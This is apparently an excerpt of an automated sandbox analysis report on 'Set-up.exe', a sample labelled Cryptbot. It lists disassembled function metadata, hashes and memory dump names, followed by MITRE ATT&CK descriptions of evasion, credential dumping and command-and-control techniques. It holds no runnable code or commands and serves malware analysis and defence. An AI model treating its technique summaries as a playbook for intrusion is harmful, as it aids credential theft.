Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction ID: 699da2e0a369b861bc3d92c91079d942badc6e43cd8f90db69fd8b708ed87e72
Opcode Fuzzy Hash: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction Fuzzy Hash: 4B413BB1A05A19CBCB20CF18C6C4785B7E1AF85744B29C6A9DC488F74AD336DC46CBA1

Function 6C7F4B80 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C7F4BBA
strlen.MSVCRT ref: 6C7F4C3D
strlen.MSVCRT ref: 6C7F4CC0
strlen.MSVCRT ref: 6C7F4D43

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 677310e2de51e5ce770d686d164a4763217f173a83c14058cd71256bdfaed117
Instruction ID: a977a8fc09ca5579df5515c656be009bf50223812f9134bf5a4e2997d46fd254
Opcode Fuzzy Hash: 677310e2de51e5ce770d686d164a4763217f173a83c14058cd71256bdfaed117
Instruction Fuzzy Hash: 81E15674A056058FCB00DF6CC2D4AAEBBF1BF44314B118A69E969CBB54D734E906CF91

Function 6C7F4380 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C7F43BA
strlen.MSVCRT ref: 6C7F443D
strlen.MSVCRT ref: 6C7F44C0
strlen.MSVCRT ref: 6C7F4543

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: c295d9e574018e126fc76e911dfab623a2a631367c1d498f62e1414e86843266
Instruction ID: 2e24a57ef6f7e66a683ccc57c09ee9b388437d92d6dc0f9751cf7b45b6d6187a
Opcode Fuzzy Hash: c295d9e574018e126fc76e911dfab623a2a631367c1d498f62e1414e86843266
Instruction Fuzzy Hash: 71E17874A056458FCB00DF6CC2C4AAEBBF1BF85314B118A69D865CBB54DB34E906CF81

Function 6C77DFA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 6C77DFAE
strlen.MSVCRT ref: 6C77DFC1

Strings

basic_string: construction from null is not valid, xrefs: 6C77DFE3

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: b5433842941d9328064ce3cccf7e351fa15609783b220bb9408f434f63ff47d3
Instruction ID: d7cce4f22584915dbb8cd8496f1f5556aeeda052f87bb93dca1cb52de0a965e2
Opcode Fuzzy Hash: b5433842941d9328064ce3cccf7e351fa15609783b220bb9408f434f63ff47d3
Instruction Fuzzy Hash: AA110D72A152048F8B11FF3DCA4945AB7F1BB9A314F55CA79E84887B05E634D808CBE3

Function 001E2F46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 001E2E97
fputc.MSVCRT ref: 001E2F07
memset.MSVCRT ref: 001E2FC2

Strings

o, xrefs: 001E2F5E

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction ID: 779cd94de69c80681834f43422f58a6ee764f174a5ede16c64e20fa7c729ca8c
Opcode Fuzzy Hash: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction Fuzzy Hash: 43312971A04A95CFCB14CF6AC1A47ADBBF5BF48340F168619D9899B706E734ED40CB90

Function 6C773616 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C773567
fputc.MSVCRT ref: 6C7735D7
memset.MSVCRT ref: 6C773692

Strings

o, xrefs: 6C77362E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction ID: 698db787e60201af06d882d8f43be68e5fadc6268705233ea738ae53ddb21b80
Opcode Fuzzy Hash: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction Fuzzy Hash: 1B315E71A09709CFCF20CF68C284799BBF1BF48354F158669D999ABB01E734E905CB60

Function 001E3424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 001E338F
fputc.MSVCRT ref: 001E33F1

Strings

@, xrefs: 001E342A

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction ID: 38e96e399bb373eadc0618505d2bb37fcc3a28998ff5be0940b292d49797ba99
Opcode Fuzzy Hash: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction Fuzzy Hash: 19115171904A808BCB15CF1AC188BAD7BF1BF84300F258559EDA95F34ADB34EE00CB54

Function 6C773AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C773A5F
fputc.MSVCRT ref: 6C773AC1

Strings

@, xrefs: 6C773AFA

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction ID: 55651fc2e8cb84ad8a4a445826fe80ada3c0ec52e9e22ea827419e74f07ab9c5
Opcode Fuzzy Hash: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction Fuzzy Hash: AA1121B1A052088BCF21CF18C6857857BF1BF85304F268669FD996FB4AD334E801CB65

Function 001E18B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 001E191E

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 001E18FF
Unknown error, xrefs: 001E18B2

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 8e2c5b51a1b64c58bddfcd75e856a1ef2038164af3b2bcaf95a976b28f554806
Instruction ID: 3a14bd64f28b2f3a9c3cc36c833cf3b9d667d0905ac1d1406d46ebf77b685c02
Opcode Fuzzy Hash: 8e2c5b51a1b64c58bddfcd75e856a1ef2038164af3b2bcaf95a976b28f554806
Instruction Fuzzy Hash: 2B0180B0408B85DBD700AF16E58841EBFF1FF89350F868898F5C956269DB3298A8C747

Function 6C787561 Relevance: 5.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C787583

Part of subcall function 6C7D3E00: memcpy.MSVCRT(?,?,?,?,-00000001,?,?,6C787596), ref: 6C7D3E63

strlen.MSVCRT ref: 6C7875F4
strlen.MSVCRT ref: 6C787662
strlen.MSVCRT ref: 6C7876D6

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 456bad89b2a3118e1b9561fd03aea4a33a24b98b9636072bb18fa50ec197dc40
Instruction ID: 105812d2b4809c65fc9a0576c5342777f469a24c15864579dbd87adc4ef15411
Opcode Fuzzy Hash: 456bad89b2a3118e1b9561fd03aea4a33a24b98b9636072bb18fa50ec197dc40
Instruction Fuzzy Hash: 885138B4B06A018FCB10EF29C198659FBF6FF85308F4285ADD9455F765CB35A809CB82

Function 001E6B60 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,001E6C81,?,?,?,?,?,?,00000000,001E4F24), ref: 001E6B87
InitializeCriticalSection.KERNEL32(?,?,?,?,001E6C81,?,?,?,?,?,?,00000000,001E4F24), ref: 001E6BC4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,001E6C81,?,?,?,?,?,?,00000000,001E4F24), ref: 001E6BD0
EnterCriticalSection.KERNEL32(?,?,?,?,001E6C81,?,?,?,?,?,?,00000000,001E4F24), ref: 001E6BF8

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: db2cbf386555265dfe7e67c8ab2890ac0b3dfb88108bdb63afc799c2819708b1
Instruction ID: 51c88425c3cc5a26e6aee3b84e4d4dddcbfca9b81095df658838acb25dcaee5e
Opcode Fuzzy Hash: db2cbf386555265dfe7e67c8ab2890ac0b3dfb88108bdb63afc799c2819708b1
Instruction Fuzzy Hash: 271140B16089C48ADB10BBBEF9C916E77E4EB60380F950935D482CBA14E771E9C4C797

Function 6C778080 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,00000002,?,6C7781A1), ref: 6C7780A7
InitializeCriticalSection.KERNEL32(?,?,00000002,?,6C7781A1), ref: 6C7780E4
InitializeCriticalSection.KERNEL32(?,?,?,00000002,?,6C7781A1), ref: 6C7780F0
EnterCriticalSection.KERNEL32(?,?,00000002,?,6C7781A1), ref: 6C778118

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 5c94848348346beaea06793f385dc74cde497a3913fbb4bc1818bb185114ca3c
Instruction ID: ab5f52e3c83e3d850a0d9f28346eb492cae76543aa46cf8b1850116313922184
Opcode Fuzzy Hash: 5c94848348346beaea06793f385dc74cde497a3913fbb4bc1818bb185114ca3c
Instruction Fuzzy Hash: 8E111EB16171089BDF30AB2CDACA65A77B5AB07358FA1093AD452D7E00E631D498C7E3

Function 001E2000 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,001E21D3,?,?,?,?,?,001E17E8), ref: 001E200E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,001E21D3,?,?,?,?,?,001E17E8), ref: 001E2035
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,001E21D3,?,?,?,?,?,001E17E8), ref: 001E203C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,001E21D3,?,?,?,?,?,001E17E8), ref: 001E205C

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: dad5812211fbeff043f34175610bb49d3caaf9bbbc4dd9ba09dc6dd6eb75f558
Instruction ID: 38a1cb3bafef89fe0c742b8fcbf4e325bbb242ebcef1d81d324fda07f98857d8
Opcode Fuzzy Hash: dad5812211fbeff043f34175610bb49d3caaf9bbbc4dd9ba09dc6dd6eb75f558
Instruction Fuzzy Hash: 24F0A4755007818FDB107FB9E9C451EBBE8EB44350F090428ED485B214D731E886CBA6

Function 6C76AB50 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C76AB5E
TlsGetValue.KERNEL32 ref: 6C76AB85
GetLastError.KERNEL32 ref: 6C76AB8C
LeaveCriticalSection.KERNEL32 ref: 6C76ABAC

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: aa7748a32cffd213364f3b86ba3a6f53a9fc86bd115af74755f8a713265684ee
Instruction ID: 1d97472248d6c9d8e770d46a5164663698daee3ea1cf6f5294f25875ffbbca0e
Opcode Fuzzy Hash: aa7748a32cffd213364f3b86ba3a6f53a9fc86bd115af74755f8a713265684ee
Instruction Fuzzy Hash: 99F081B2A023118FDB10BF79958590A7BB4EA46368B050578ED584BA04D730A948CBE3

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

